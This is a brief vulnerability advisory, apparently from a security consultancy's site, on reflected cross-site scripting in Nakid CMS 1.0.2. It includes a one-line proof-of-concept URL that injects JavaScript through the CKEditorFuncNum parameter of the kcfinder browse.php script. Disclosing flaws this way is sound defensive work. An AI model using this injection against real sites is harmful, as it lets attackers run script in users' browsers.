Home
Consulting
Advisories
Software
Articles
Contact

Nakid CMS 1.0.2 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in Nakid CMS 1.0.2 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/cms/assets/addons/kcfinder/browse.php?CKEditorFuncNum=0);alert(0);//


Copyright © 2018 AutoSec Tools LLC